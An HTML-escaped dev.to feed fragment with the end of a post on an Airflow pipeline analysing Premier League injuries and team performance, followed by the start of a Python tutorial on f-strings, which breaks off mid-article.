        &lt;span class="n"&gt;matches_json&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;extract_match_data&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
        &lt;span class="n"&gt;players_raw&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;extract_understat_player_stats&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;

        &lt;span class="n"&gt;kwargs&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;ti&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;].&lt;/span&gt;&lt;span class="nf"&gt;xcom_push&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;injury_html&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;value&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;injury_html&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;prettify&lt;/span&gt;&lt;span class="p"&gt;())&lt;/span&gt;
        &lt;span class="n"&gt;kwargs&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;ti&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;].&lt;/span&gt;&lt;span class="nf"&gt;xcom_push&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;matches_json&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;value&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;matches_json&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="n"&gt;kwargs&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;ti&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;].&lt;/span&gt;&lt;span class="nf"&gt;xcom_push&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;players_raw&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;value&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;players_raw&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

    &lt;span class="nd"&gt;@task&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
    &lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;transform_task&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;**&lt;/span&gt;&lt;span class="n"&gt;kwargs&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
        &lt;span class="kn"&gt;from&lt;/span&gt; &lt;span class="n"&gt;bs4&lt;/span&gt; &lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;BeautifulSoup&lt;/span&gt;

        &lt;span class="n"&gt;ti&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;kwargs&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;ti&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;
        &lt;span class="n"&gt;conn&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;get_db_connection&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
        &lt;span class="n"&gt;team_name_to_id&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;get_team_name_to_id&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;conn&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

        &lt;span class="c1"&gt;# Load XComs
&lt;/span&gt;        &lt;span class="n"&gt;injury_html&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;ti&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;xcom_pull&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;injury_html&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;task_ids&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;extract_task&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="n"&gt;matches_json&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;ti&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;xcom_pull&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;matches_json&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;task_ids&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;extract_task&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="n"&gt;players_raw&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;ti&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;xcom_pull&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;players_raw&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;task_ids&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;extract_task&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

        &lt;span class="c1"&gt;# Transform
&lt;/span&gt;        &lt;span class="n"&gt;match_data&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;transform_match_data&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;matches_json&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;team_name_to_id&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="n"&gt;players&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;stats&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;transform_player_stats&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;players_raw&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;team_name_to_id&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;conn&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="n"&gt;injuries&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;transform_injury_data&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nc"&gt;BeautifulSoup&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;injury_html&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;lxml&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt; &lt;span class="n"&gt;conn&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;team_name_to_id&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

        &lt;span class="c1"&gt;# Push to XComs
&lt;/span&gt;        &lt;span class="n"&gt;ti&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;xcom_push&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;matches&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;value&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;match_data&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="n"&gt;ti&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;xcom_push&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;players&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;value&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;players&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="n"&gt;ti&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;xcom_push&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;player_stats&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;value&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;stats&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="n"&gt;ti&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;xcom_push&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;injuries&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;value&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;injuries&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

    &lt;span class="nd"&gt;@task&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
    &lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;load_task&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;**&lt;/span&gt;&lt;span class="n"&gt;kwargs&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
        &lt;span class="n"&gt;ti&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;kwargs&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;ti&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;
        &lt;span class="n"&gt;conn&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;get_db_connection&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;

        &lt;span class="n"&gt;matches&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;ti&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;xcom_pull&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;matches&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;task_ids&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;transform_task&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="n"&gt;players&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;ti&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;xcom_pull&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;players&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;task_ids&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;transform_task&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="n"&gt;player_stats&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;ti&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;xcom_pull&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;player_stats&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;task_ids&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;transform_task&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="n"&gt;injuries&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;ti&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;xcom_pull&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;injuries&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;task_ids&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;transform_task&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

        &lt;span class="k"&gt;with&lt;/span&gt; &lt;span class="n"&gt;conn&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;cursor&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt; &lt;span class="k"&gt;as&lt;/span&gt; &lt;span class="n"&gt;cur&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
            &lt;span class="nf"&gt;create_injury_schema&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;conn&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
            &lt;span class="nf"&gt;load_teams&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;cur&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
            &lt;span class="nf"&gt;insert_matches&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;cur&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;matches&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
            &lt;span class="nf"&gt;insert_player_details&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;cur&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;players&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
            &lt;span class="nf"&gt;insert_player_stats&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;cur&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;player_stats&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
            &lt;span class="n"&gt;conn&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;commit&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;

        &lt;span class="nf"&gt;load_injuries_data&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;conn&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;injuries&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

    &lt;span class="c1"&gt;# Set dependencies
&lt;/span&gt;    &lt;span class="nf"&gt;extract_task&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&amp;gt;&lt;/span&gt; &lt;span class="nf"&gt;transform_task&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&amp;gt;&lt;/span&gt; &lt;span class="nf"&gt;load_task&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The diagram below shows successful DAG runs, eventually:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fi2xocatybu7bhaus0kst.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fi2xocatybu7bhaus0kst.png" alt="DAG runs" width="444" height="242"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Data Analysis
&lt;/h2&gt;

&lt;p&gt;Once the data is consolidated, it can now be used for statistical analysis to try and find the correlation between injury occurrences and team performance metrics. I was able to get team and plater stats for the whole season, but the data covering the injuries spanned a few weeks before my free trial on ScrapperAPI expired, so proper analysis of the entire season wasn't possible. With data covering the last third or so of the 2024 season, I was able to do the following analysis:&lt;/p&gt;

&lt;h3&gt;
  
  
  Frequency of injuries by team
&lt;/h3&gt;

&lt;p&gt;Purpose: Determine teams with the most injuries&lt;br&gt;
Finding: Man United had a lower number of injuries compared to other teams. Chelsea had the most with 4, and Arsenal had the least with none. Man United had one.&lt;/p&gt;

&lt;h3&gt;
  
  
  Injury Rate vs Win Percentage Analysis
&lt;/h3&gt;

&lt;p&gt;Purpose: Determine if teams with more injuries perform worse&lt;br&gt;
Finding: Man United had less injuries than the other teams, but performed worse, showing injuries were not the only cause of poor performance.&lt;/p&gt;

&lt;h2&gt;
  
  
  Challenges faced during building this pipeline.
&lt;/h2&gt;

&lt;h3&gt;
  
  
  a. Data extraction
&lt;/h3&gt;

&lt;p&gt;The Cloudflare CAPTCHA test prevented me from using basic python libraries&lt;br&gt;
to extract injury data, resulting in the need for a paid-for API for extraction. This also meant I could not get injury data spanning the entire season for proper analysis.&lt;/p&gt;

&lt;h3&gt;
  
  
  b. Data Normalization
&lt;/h3&gt;

&lt;p&gt;Since data was collected from multiple sources referencing the same players, each source used different identifiers to represent them. To ensure consistency and eliminate redundancy, I applied database normalization techniques — standardizing player identifiers, resolving data inconsistencies, and structuring the data into related tables for more efficient storage and retrieval.&lt;/p&gt;

&lt;h2&gt;
  
  
  Conclusion
&lt;/h2&gt;

&lt;p&gt;Building this pipeline was more than just a coding exercise — it was a practical test of my data engineering foundations. From web scraping and normalization to ETL automation and database design, the project taught me how data moves through every stage of an analytical workflow.&lt;br&gt;
Even with partial data, the findings challenged assumptions about Manchester United’s poor season and highlighted how data engineering enables evidence-based analysis.&lt;br&gt;
This project strengthened my grasp of ETL orchestration, workflow automation, and schema design — setting the stage for future work involving analytics dashboards and machine learning-driven insights.&lt;/p&gt;

</description>
      <category>dataengineering</category>
      <category>python</category>
      <category>data</category>
    </item>
    <item>
      <title>Writing Clear Python: A Guide to F-Strings and Docstrings</title>
      <dc:creator>James K.</dc:creator>
      <pubDate>Wed, 21 May 2025 09:34:25 +0000</pubDate>
      <link>https://dev.to/james_kariuki/writing-clear-python-a-guide-to-f-strings-and-docstrings-c49</link>
      <guid>https://dev.to/james_kariuki/writing-clear-python-a-guide-to-f-strings-and-docstrings-c49</guid>
      <description>&lt;p&gt;In Python, writing clean, maintainable, and well-documented code is not just encouraged—it’s built into the language. Two standout features that help achieve this are f-strings and docstrings.&lt;br&gt;
This article explores how these features work, why they matter, and how to use them effectively to write expressive and self-documenting Python code.&lt;/p&gt;
&lt;h2&gt;
  
  
  F-strings
&lt;/h2&gt;

&lt;p&gt;A formatted string literal or f-string is a string literal that is prefixed with 'f' or 'F'. These strings may contain replacement fields, which are expressions delimited by curly braces {}. It’s like a shortcut for making strings with dynamic content. &lt;br&gt;
F-strings were introduced in Python version 3.6 . Before Python 3.6, you had two main tools for interpolating values, variables, and expressions inside string literals:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;The string interpolation operator (%), or modulo operator&lt;/li&gt;
&lt;li&gt;The str.format() method&lt;/li&gt;
&lt;/ul&gt;
&lt;h4&gt;
  
  
  The Modulo Operator(%)
&lt;/h4&gt;

&lt;p&gt;The modulo operator (%) was the first tool for string interpolation and formatting in Python and has been in the language since the beginning. Here’s what using this operator looks like in practice:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="n"&gt;name&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;Jane&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;
&lt;span class="n"&gt;age&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;25&lt;/span&gt;

&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;Hello, %s! You&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;re %s years old.&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt; &lt;span class="o"&gt;%&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;name&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;age&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Output&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="n"&gt;Hello&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;Jane&lt;/span&gt;&lt;span class="err"&gt;!&lt;/span&gt; &lt;span class="n"&gt;You&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;re 25 years old.
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;In this example, we use a tuple of values as the right-hand operand to %. Note that we've used a string and an integer. Because you use the %s specifier, Python converts both objects to strings.&lt;/p&gt;

&lt;h4&gt;
  
  
  The str.format() Method
&lt;/h4&gt;

&lt;p&gt;The str.format() method is an improvement compared to the % operator because it fixes a couple of issues and supports the string formatting mini-language. With .format(), curly braces delimit the replacement fields.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="n"&gt;name&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;Jane&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;
&lt;span class="n"&gt;age&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;25&lt;/span&gt;

&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;Hello, {}! You&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;re {} years old.&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;format&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;name&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;age&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The example above outputs:&lt;br&gt;
"Hello, Jane! You're 25 years old."&lt;/p&gt;
&lt;h4&gt;
  
  
  F-strings
&lt;/h4&gt;

&lt;p&gt;F-strings joined the party in Python 3.6 with PEP 498. With f-strings, you can easily insert values or expressions directly into the string without much fuss. While other string literals always have a constant value, formatted strings are really expressions evaluated at run time. The parts of the string outside curly braces are treated literally, except that any doubled curly braces '{{' or '}}' are replaced with the corresponding single curly brace. A single opening curly bracket '{' marks a replacement field, which starts with a Python expression.&lt;/p&gt;

&lt;p&gt;So, f-strings are like a simple way to put variables or expressions into your strings without having to use complicated formatting methods. It’s just a more straightforward way to make your strings dynamic and flexible.&lt;br&gt;
Here's a simple example of using f-strings in Python:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="n"&gt;name&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;Jane&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;
&lt;span class="n"&gt;age&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;25&lt;/span&gt;

&lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sa"&gt;f&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;My name is &lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="n"&gt;name&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="s"&gt; and I am &lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="n"&gt;age&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="s"&gt; years old.&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;In the example, f"My name is {name} and I am {age} years old." is an f-string — a string prefixed with f that allows expressions inside curly braces {} to be evaluated and included directly in the output.&lt;br&gt;
{name} is replaced with the value "Jane".&lt;br&gt;
{age} is replaced with the value 25.&lt;br&gt;
